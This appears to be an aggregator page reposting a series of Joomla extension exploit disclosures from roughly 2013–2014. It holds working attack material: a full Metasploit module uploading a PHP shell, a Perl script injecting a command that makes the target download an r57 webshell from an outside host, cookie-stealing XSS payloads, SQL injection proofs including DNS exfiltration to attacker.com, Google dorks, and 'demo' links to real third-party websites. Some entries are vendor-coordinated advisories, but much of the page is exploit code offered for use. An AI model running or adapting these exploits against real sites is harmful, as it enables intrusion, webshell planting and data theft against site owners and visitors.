Quantcast
Channel: joomla – MondoUnix
Viewing all 119 articles
Browse latest View live

Joomla JDownloads Cross Site Scripting

$
0
0
#####################################
Title:com_jdownloads xss Vulnerability
#####################
##############################################################
 
  __  __          _____  _      ______ ______ _______ _____
 |  \/  |   /\   |  __ \| |    |  ____|  ____|__   __/ ____|
 | \  / |  /  \  | |  | | |    | |__  | |__     | | | (___
 | |\/| | / /\ \ | |  | | |    |  __| |  __|    | |  \___ \
 | |  | |/ ____ \| |__| | |____| |____| |____   | |  ____) |
 |_|  |_/_/    \_\_____/|______|______|______|  |_| |_____/
 
##############################################################
#Author:Darksnipper  & Dream.killer
 
#Email:Darksnipper@live.com
 
#####################################
#Home:-   www.MadLeeTs.com
#####################################
 
Vendor Link:Www.jdownloads.com
 
Dork:-inurl:"component/jdownloads/search"
 
Tested On:- Windows 7,Linux,Windows xp
 
######################################################################
#P.o.c
 
http: //127.0.0.1/components/jdownloads/search
 
payload
 
<script>alert(document.cookie)</script>
 
Demo:-
 
http://dsya.goa.gov.in/component/jdownloads/search
 
payload:-
<script>alert(document.cookie)</script>
 
 
########################################################################
Greetz:Dream.killer,Soul~inj3ct0r,Error Haxor,Fazil
Mir,Force-Ex,x3o-1337,Shadow008,1337,H4x0rl1f3,Invectus,Sahrawi
Hacker,HaXor KaKKa,Retno Pro, Tr4ck3r,b0x,Gujjar Pcp,madc0de Haxor,P4k
Command3r,Pain006,Anon DeXter,MindCracker,Ap3x Pr3d1at0r,Ment@l
Mind,Sujit Ujale,All Madleets Members,Kashmiri Hackers & All Freedom
Fighters.
########################################################################

Joomla Media Manager File Upload Vulnerability

$
0
0
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Joomla Media Manager File Upload Vulnerability",
      'Description'    => %q{
        This module exploits a vulnerability found in Joomla 2.5.x up to 2.5.13, as well as
        3.x up to 3.1.4 versions. The vulnerability exists in the Media Manager component,
        which comes by default in Joomla, allowing arbitrary file uploads, and results in
        arbitrary code execution. The module has been tested successfully on Joomla 2.5.13
        and 3.1.4 on Ubuntu 10.04. Note: If public access isn't allowed to the Media
        Manager, you will need to supply a valid username and password (Editor role or
        higher) in order to work properly.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Jens Hinrichsen', # Vulnerability discovery according to the OSVDB
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '95933' ],
          [ 'URL', 'http://developer.joomla.org/security/news/563-20130801-core-unauthorised-uploads' ],
          [ 'URL', 'http://www.cso.com.au/article/523528/joomla_patches_file_manager_vulnerability_responsible_hijacked_websites/' ],
          [ 'URL', 'https://github.com/joomla/joomla-cms/commit/fa5645208eefd70f521cd2e4d53d5378622133d8' ],
          [ 'URL', 'http://niiconsulting.com/checkmate/2013/08/critical-joomla-file-upload-vulnerability/' ]
        ],
      'Payload'        =>
        {
          'DisableNops' => true,
          # Arbitrary big number. The payload gets sent as POST data, so
          # really it's unlimited
          'Space'       => 262144, # 256k
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Joomla 2.5.x <=2.5.13', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Aug 01 2013",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
          OptString.new('USERNAME', [false, 'User to login with', '']),
          OptString.new('PASSWORD', [false, 'Password to login with', '']),
        ], self.class)
 
  end
 
  def peer
    return "#{rhost}:#{rport}"
  end
 
  def check
    res = get_upload_form
 
    if res and res.code == 200
      if res.body =~ /You are not authorised to view this resource/
        print_status("#{peer} - Joomla Media Manager Found but authentication required")
        return Exploit::CheckCode::Detected
      elsif res.body =~ /<form action="(.*)" id="uploadForm"/
        print_status("#{peer} - Joomla Media Manager Found and authentication isn't required")
        return Exploit::CheckCode::Detected
      end
    end
 
    return Exploit::CheckCode::Safe
  end
 
  def upload(upload_uri)
    begin
      u = URI(upload_uri)
    rescue ::URI::InvalidURIError
      fail_with(Exploit::Failure::Unknown, "Unable to get the upload_uri correctly")
    end
 
    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, "application/x-php", nil, "form-data; name=\"Filedata[]\"; filename=\"#{@upload_name}.\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
 
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => "#{u.path}?#{u.query}",
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'cookie'   => @cookies,
      'vars_get' => {
        'asset'  => 'com_content',
        'author' => '',
        'format' => '',
        'view'   => 'images',
        'folder' => ''
      },
      'data'     => post_data
    })
 
    return res
 
  end
 
  def get_upload_form
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php"),
      'cookie'   => @cookies,
      'encode_params' => false,
      'vars_get' => {
        'option' => 'com_media',
        'view'   => 'images',
        'tmpl'   => 'component',
        'e_name' => 'jform_articletext',
        'asset'  =>  'com_content',
        'author' => ''
      }
    })
 
    return res
  end
 
  def get_login_form
 
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
      'cookie'   => @cookies,
      'vars_get' => {
        'view' => 'login'
      }
    })
 
    return res
 
  end
 
  def login
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(target_uri.path, "index.php", "component", "users", "/"),
      'cookie'   => @cookies,
      'vars_get' => {
        'task' => 'user.login'
      },
      'vars_post' => {
        'username' => @username,
        'password' => @password
        }.merge(@login_options)
      })
 
    return res
  end
 
  def parse_login_options(html)
    html.scan(/<input type="hidden" name="(.*)" value="(.*)" \/>/) {|option|
      @login_options[option[0]] = option[1] if option[1] == "1" # Searching for the Token Parameter, which always has value "1"
    }
  end
 
  def exploit
    @login_options = {}
    @cookies = ""
    @upload_name = "#{rand_text_alpha(rand(5) + 3)}.php"
    @username = datastore['USERNAME']
    @password = datastore['PASSWORD']
 
    print_status("#{peer} - Checking Access to Media Component...")
    res = get_upload_form
 
    if res and res.code == 200 and res.headers['Set-Cookie'] and res.body =~ /You are not authorised to view this resource/
      print_status("#{peer} - Authentication required... Proceeding...")
 
      if @username.empty? or @password.empty?
        fail_with(Exploit::Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials")
      end
      @cookies = res.get_cookies.sub(/;$/, "")
 
      print_status("#{peer} - Accessing the Login Form...")
      res = get_login_form
      if res.nil? or res.code != 200 or res.body !~ /login/
        fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Login Form")
      end
      parse_login_options(res.body)
 
      res = login
      if not res or res.code != 303
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to Authenticate")
      end
    elsif res and res.code ==200 and res.headers['Set-Cookie'] and res.body =~ /<form action="(.*)" id="uploadForm"/
      print_status("#{peer} - Authentication isn't required.... Proceeding...")
      @cookies = res.get_cookies.sub(/;$/, "")
    else
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component")
    end
 
    print_status("#{peer} - Accessing the Upload Form...")
    res = get_upload_form
 
    if res and res.code == 200 and res.body =~ /<form action="(.*)" id="uploadForm"/
      upload_uri = Rex::Text.html_decode($1)
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to Access the Upload Form")
    end
 
    print_status("#{peer} - Uploading shell...")
 
    res = upload(upload_uri)
 
    if res.nil? or res.code != 200
      fail_with(Exploit::Failure::Unknown, "#{peer} - Upload failed")
    end
 
    register_files_for_cleanup("#{@upload_name}.")
    print_status("#{peer} - Executing shell...")
    send_request_cgi({
      'method'   => 'GET',
      'uri'      => normalize_uri(target_uri.path, "images", @upload_name),
    })
 
  end
 
end

Joomla Virtuemart 2.0.22a SQL Injection

$
0
0
------------------------------------------------------------
Joomla! VirtueMart component <= 2.0.22a - SQL Injection
------------------------------------------------------------
 
== Description ==
- Software link: http://www.virtuemart.net/
- Affected versions: All versions between 2.0.8 and 2.0.22a are vulnerable.
- Vulnerability discovered by: Matias Fontanini
 
== Vulnerability ==
The vulnerability is located in the "user" controller, "removeAddressST" 
task. The "virtuemart_userinfo_id" parameter is not properly sanitized 
before being used in the "DELETE" query performed in it, allowing the 
execution of arbitrary SQL queries.
 
In order to exploit the vulnerability, an attacker must be authenticated 
as a customer in the application. However, since the system allows free 
account registration, this is not a problem.
 
== Proof of concept ==
The following example URL uses the MySQL "sleep" function through the 
injection:
 
http://example.com/index.php?option=com_virtuemart&view=user&task=removeAddressST&virtuemart_userinfo_id=16%22%20and%20sleep(10)%20and%20%22%22%3D%22
 
== Solution ==
Upgrade the product to the 2.0.22b version.
 
== Report timeline ==
[2013-08-15] Vulnerability reported to vendor.
[2013-08-16] Developers answered back.
[2013-08-22] VirtueMart 2.0.22b was released, which fixes the the 
reported issue.
[2013-08-22] Public disclosure.

Joomla JVideoClip Blind SQL Injection

$
0
0
================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog      : http://sixp4ck3r.blogspot.com/
Credits        : To my love!
Dork           : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind SQL Injection]
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[bSQLi]&Itemid=6
 
---------------------------------------------------------------------------
 
SixP4ck3r from Bolivia
___EOF____

Joomla JMultimedia Command Execution

$
0
0
#!/usr/bin/perl
# Exploit Title: com_jmultimedia Remote Command Execution
# Author: Deepankar Arora and Rafay Baloch
# Vendor: http://joomlacode.org/gf/project/denvideo/
# Enter the target in this form --> http://victim.com/
# Change shell path to your own, if needed
use LWP::UserAgent;
use HTTP::Request;
$target = $ARGV[0];
 
if($target eq '')
{
print "======================================================\n";
print "  com_jmultimedia Remote Command Execution exploit   \n";
print "               (Automatic Shell Upload)               \n";
print "            Deepankar Arora and Rafay Baloch          \n";
print "======================================================\n";
sleep(0.8);
print "Usage: perl exploit.pl <target> \n";
exit(1);
}
 
if ($target !~ /http:\/\//)
{
$target = "http://$target";
}
 
#print "[*] Enter the address of your hosted TXT shell (ex: '
http://c99.gen.tr/r57.txt') => ";
#$shell = <STDIN>;
sleep(1);
print "======================================================\n";
print "  com_jmultimedia Remote Command Execution exploit   \n";
print "               (Automatic Shell Upload)                \n";
print "          By Deepankar Arora and Rafay Baloch         \n";
print "======================================================\n";
sleep(1.1);
print "[*] Sending exploit ... \n";
sleep(1.1);
$agent = LWP::UserAgent->new();
$agent->agent('Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101
Firefox/14.0.1');
$shell = "wget http://www.r57c99shell.net/shell/r57.txt -O shell.txt";
$website =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php?src=file.jpg&fltr
 
[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; $shell ;
&phpThumbDebug=9";
 
$request = $agent->request(HTTP::Request->new(GET=>$website));
 
if ($request->is_success)
{
print "[+] Exploit sent with success. \n";
sleep(1.4);
}
 
else
{
print "[-] Exploit sent but probably the website is not vulnerable. \n";
sleep(1.3);
}
 
print "[*] Checking if the txt shell has been uploaded...\n";
sleep(1.2);
 
$cwebsite =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/shell.txt";
$creq = $agent->request(HTTP::Request->new(GET=>$cwebsite));
 
if ($creq->is_success)
{
print "[+] Txt Shell uploaded :) \n";
sleep(1);
print "[*] Moving it to PHP format... Please wait... \n";
sleep(1.1);
$mvwebsite =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/phpThumb.php?
 
src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg
jpeg:fail.jpg ; mv shell.txt shell.php ;
 
&phpThumbDebug=9";
$mvreq = $agent->request(HTTP::Request->new(GET=>$mvwebsite));
 
$cwebsite =
"$target/components/com_jmultimedia/assets/thumbs/phpthumb/shell.php";
$c2req = $agent->request(HTTP::Request->new(GET=>$cwebsite));
 
if ($c2req->is_success)
{
print "[+] PHP Shell uploaded => $cwebsite :) \n";
sleep(0.8);
print "[*] Do you want to open it? (y/n) => ";
$open = <STDIN>;
 
if ($open == "y")
{
$firefox = "firefox $cwebsite";
system($firefox);
}
 
}
 
else
{
print "[-] Error while moving shell from txt to PHP :( \n";
exit(1);
}
 
}
 
else
{
print "[-] Txt shell not uploaded. :( \n";
}

(49)

Joomla MijoSearch Extension XSS and Full Path Disclosure

$
0
0
Advisory ID: HTB23186
Product: MijoSearch
Vendor: Mijosoft
Vulnerable Version(s): 2.0.1 and probably prior
Tested Version: 2.0.1
Advisory Publication:  November 25, 2013  [without technical details]
Vendor Notification: November 25, 2013 
Public Disclosure: December 16, 2013 
Vulnerability Type: Cross-Site Scripting [CWE-79], Information Exposure Through Externally-generated Error Message 
[CWE-211]
CVE References: CVE-2013-6878, CVE-2013-6879
Risk Level: Medium 
CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered 2 vulnerabilities in MijoSearch Joomla Extension, which can be 
exploited to gain access to potentially sensitive data and perform Cross-Site Scripting (XSS) attacks against users of 
vulnerable application.
 
 
1) Cross-site Scripting in MijoSearch: CVE-2013-6878
 
The vulnerability exists due to insufficient sanitisation of user-supplied data appended to 
"/component/mijosearch/search" URL. A remote attacker can trick a logged-in user to open a specially crafted link and 
execute arbitrary HTML and script code in browser in context of the vulnerable website.
 
The following exploitation example uses the JavaScript alert() function to display "ImmuniWeb" word:
 
http://[host]/component/mijosearch/search?query=im%22%3E%3Cdiv%20onmouseover=alert%28%22ImmuniWeb%22%29%20style=%22width:100%;height:10000px;z-index:100%22%3E%3C/div%3E&limit=15&order=relevance&orderdir=desc
 
 
2) Information Exposure Through Externally-generated Error Message in MijoSearch: CVE-2013-6879
 
The vulnerability exists due to improper implementation of error handling mechanisms in "/component/mijosearch/search" 
URL. A remote attacker can send a specially crafted HTTP GET request to the vulnerable web application and gain 
knowledge of full installation path of the application. 
 
The following exploitation example displays a warning message and installation path (if PHP "display_errors" is on)
 
http://[host]/component/mijosearch/search?query=im%22%3Eimmuniweb&limit=15%27%22%3Cb%3Eimmuniweb&order=relevance%27%22%3Cb%3Eimmuniweb&orderdir=desc%27%22%3Cb%3Eimmuniweb
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Currently we are not aware about any vendor-supplied patches or solutions. It's recommended to deactivate the 
vulnerable extension.
 
Vendor notification and disclosure timeline:
 
2013-11-25 
   Vendor notified via online ticket system
   Vendor denies any vulnerabilities
   Vendor authorizes us to test his website
   Vulnerabilities reproduced (screenshots available)
   Vendor still denies the vulnerabilities
2013-11-26 
   Vendor provided with exact version of vulnerable system
   Vendor still denies the vulnerabilities
   Vendor refuses to collaborate
   Vendor refuses to confirm other vulnerable version(s)
   Vendor bans one of our IPs on online ticket system
2013-12-14 
   Vendor suspends our user account on online ticket system 
   Vendor contacted again by all available emails
2013-12-16 
   No single reply from the vendor.
 
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23186 - https://www.htbridge.com/advisory/HTB23186 - Multiple Vulnerabilities in 
MijoSearch.
[2] MijoSearch - http://mijosoft.com/joomla-extensions/mijosearch-joomla-search-engine - MijoSearch is flexible and 
powerful Joomla Search component with an easy-to-use interface.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security 
assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(84)

Joomla AceSearch 3.0 Cross Site Scripting

$
0
0
#Title : Joomla Component AceSearch Cross Site Scripting
 
#Author : DevilScreaM
 
#Date : 5 January 2014
 
#Category : Web Applications
 
#Product : http://www.joomace.net/joomla-extensions/acesearch/
 
#Version : 3.0
 
#Type : PHP
 
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
 
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
 
#Tested : Mozila, Chrome, Opera -> Windows & Linux
 
#Vulnerabillity : Cross Site Scripting
 
#Dork : inurl:component/acesearch/
 
 
 
Cross Site Scripting
 
http://site-target/component/acesearch/search?query=”>[XSS]
Use “> for Bypass Cross Site Scripting
 
Example :
http://kpi.go.id/index.php/component/acesearch/search?query=”><h1>DevilScreaM</h1>

(73)

Joomla Aclsfgpl Shell Upload

$
0
0
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Joomla Component com_aclsfgpl File Upload Vulnerability
[+] Date: 07-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"index.php?option=com_aclsfgpl" add_form
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com
 
########################################################################################
+Exploit:
You can upload file (.php/.php.jpg...)
+P.O.C:
127.0.0.1/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form
 
Shell path:
copy shell pic link or 127.0.0.1/components/com_aclsfgpl/photos/
 
Demo:
http://www.club-plongee.com/index.php?option=com_aclsfgpl&Itemid=155&ct=womenm&md=add_form
http://www.triclubsandiego.org/index.php?option=com_aclsfgpl&Itemid=269&ct=tcsd1&md=add_form
http://aero.decines.free.fr/modelisme/index.php?option=com_aclsfgpl&Itemid=90&ct=pet5&md=add_form
 
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

(85)


Joomla Melody Cross Site Scripting

$
0
0
[+] Author: TUNISIAN CYBER
[+] Exploit Title: Joomla Component com_melody XSS Vulnerability
[+] Date: 09-01-2014
[+] Category: WebApp
[+] Google Dork: :inurl:"components/com_melody/"
[+] Tested on: KaliLinux
[+} Friend's blog: www.na3il.com
 
########################################################################################
+Exploit:
The Joomla melody component suffers from an xss vulnerability.
+P.O.C:
127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>XSS</a>
 
Demo:
http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E
http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E
godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(1)'>XSS</a>
 
./3nD
########################################################################################
Greets to: XMaX-tn, N43il HacK3r, XtechSEt
Sec4Ever Members:
DamaneDz
UzunDz
GEOIX
########################################################################################

(43)

Joomla Sexy Polling Extension SQL Injection

$
0
0
Advisory ID: HTB23193
Product: Sexy Polling Joomla Extension
Vendor: 2GLux
Vulnerable Version(s): 1.0.8 and probably prior
Tested Version: 1.0.8
Advisory Publication:  December 26, 2013  [without technical details]
Vendor Notification: December 26, 2013 
Vendor Patch: January 8, 2014 
Public Disclosure: January 16, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2013-7219
Risk Level: High 
CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered vulnerability in Sexy Polling Joomla Extension, which can be 
exploited to perform SQL Injection attacks.
 
 
1) SQL Injection in Sexy Polling Joomla Extension: CVE-2013-7219
 
The vulnerability exists due to insufficient validation of "answer_id[]" HTTP POST parameter passed to 
"/components/com_sexypolling/vote.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in 
application's database.
 
The following exploitation example is based on DNS Exfiltration technique and may be used if the database of the 
vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for 
`version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server 
of which is controlled by the attacker):
 
 
<form action="http://[host]/components/com_sexypolling/vote.php"; 
method="post" name="main">
<input type="hidden" name="answer_id[]"  value="',(select load_file(CONCAT(CHAR(92),CHAR(92),(select
version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))),'','','','','')
-- ">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Sexy Polling 1.0.9
 
More Information:
http://2glux.com/forum/sexypolling/sexy-polling-security-vulnerability-notification-t2026.html
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23193 - https://www.htbridge.com/advisory/HTB23193 - SQL Injection in Sexy Polling 
Joomla Extension.
[2] Sexy Polling Joomla Extension - http://2glux.com/projects/sexypolling - Polling for Joomla.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security 
assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(21)

Joomla JV Comment 3.0.2 SQL Injection

$
0
0
Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication:  January 2, 2014  [without technical details]
Vendor Notification: January 2, 2014 
Vendor Patch: January 14, 2014 
Public Disclosure: January 23, 2014 
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium 
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.
 
 
1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
 
The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.
 
The following exploitation example displays version of MySQL database:
 
 
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task"   value="comment.like">
<input type="hidden" name="id"     value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to JV Comment 3.0.3
 
More Information:
http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - SQL Injection in JV Comment Joomla Extension.
[2] JV Comment Joomla Extension - http://www.joomlavi.com/joomla-extensions/jv-comment.html - With JV Comment, adding a comment system to your articles is now as simple as installing a plug-in and adjusting a few parameters.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

(253)

Joomla Komento 1.7.2 Cross Site Scripting

$
0
0
Advisory ID: HTB23194
Product: Komento Joomla Extension
Vendor: Stack Ideas Sdn Bhd.
Vulnerable Version(s): 1.7.2 and probably prior
Tested Version: 1.7.2
Advisory Publication:  January 2, 2014  [without technical details]
Vendor Notification: January 2, 2014 
Vendor Patch: January 2, 2014 
Public Disclosure: January 23, 2014 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-0793
Risk Level: Medium 
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Komento Joomla Extension, which can be exploited to perform script insertion attacks.
 
 
1) Cross-Site Scripting (XSS) in Komento Joomla Extension: CVE-2014-0793
 
1.1 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "website" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "Website" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the nickname of the malicious author.
 
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's nickname in comment:
 
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl"    value="component">
<input type="hidden" name="format"  value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component"  value="com_content"> <input type="hidden" name="cid"  value="24"> <input type="hidden" name="comment"  value="comment"> <input type="hidden" name="parent_id"  value="0"> <input type="hidden" name="name"  value="name"> <input type="hidden" name="email"  value="email@email.com"> <input type="hidden" name="website"  value='http://www.htbridge.com" 
onclick="javascript:alert(/immuniweb/);"'>
<input type="hidden" name="subscribe"  value="false"> <input type="hidden" name="latitude"  value=''>
<input type="hidden" name="longitude"  value="1"> <input type="hidden" name="address"  value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId"  value="435"> <input type="hidden" name="option"  value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
 
 
1.2 The vulnerability exists due to insufficient sanitisation of user-supplied data passed via the "latitude" HTTP POST parameter to "/?option=com_komento" URL. A remote attacker can submit a comment with specially crafted "latitude" field and execute arbitrary HTML and script code in browser in context of the vulnerable website when a user clicks on the address of the malicious author.
 
The following exploitation example uses the "alert()" JavaScript function to display word "immuniweb" when user clicks on the attacker's address in comment:
 
<form action="http://[host]/?option=com_komento" method="post" name="main">
<input type="hidden" name="tmpl"    value="component">
<input type="hidden" name="format"  value="ajax"> <input type="hidden" name="no_html" value="1"> <input type="hidden" name="component"  value="com_content"> <input type="hidden" name="cid"  value="24"> <input type="hidden" name="comment"  value="comment"> <input type="hidden" name="parent_id"  value="0"> <input type="hidden" name="name"  value="name"> <input type="hidden" name="email"  value="email@email.com"> <input type="hidden" name="website"  value='www.htbridge.com'>
<input type="hidden" name="subscribe"  value="false"> <input type="hidden" name="latitude"  value='" 
onclick="javascript:alert(/imuniweb/);">'>
<input type="hidden" name="longitude"  value="1"> <input type="hidden" name="address"  value="1"> <input type="hidden" name="contentLink" value="http://joomla/"> <input type="hidden" name="pageItemId"  value="435"> <input type="hidden" name="option"  value="com_komento"> <input type="hidden" name="namespace" value="site.views.komento.addcomment">
<input type="hidden" name="4873559e1d03545682ae270bf7b0c8ec" value="1"> <input type="submit" id="btn"> </form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Update to Komento 1.7.3
 
More Informaion:
http://stackideas.com/downloads/changelog/komento
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23194 - https://www.htbridge.com/advisory/HTB23194 - Cross-Site Scripting (XSS) in Komento Joomla Extension.
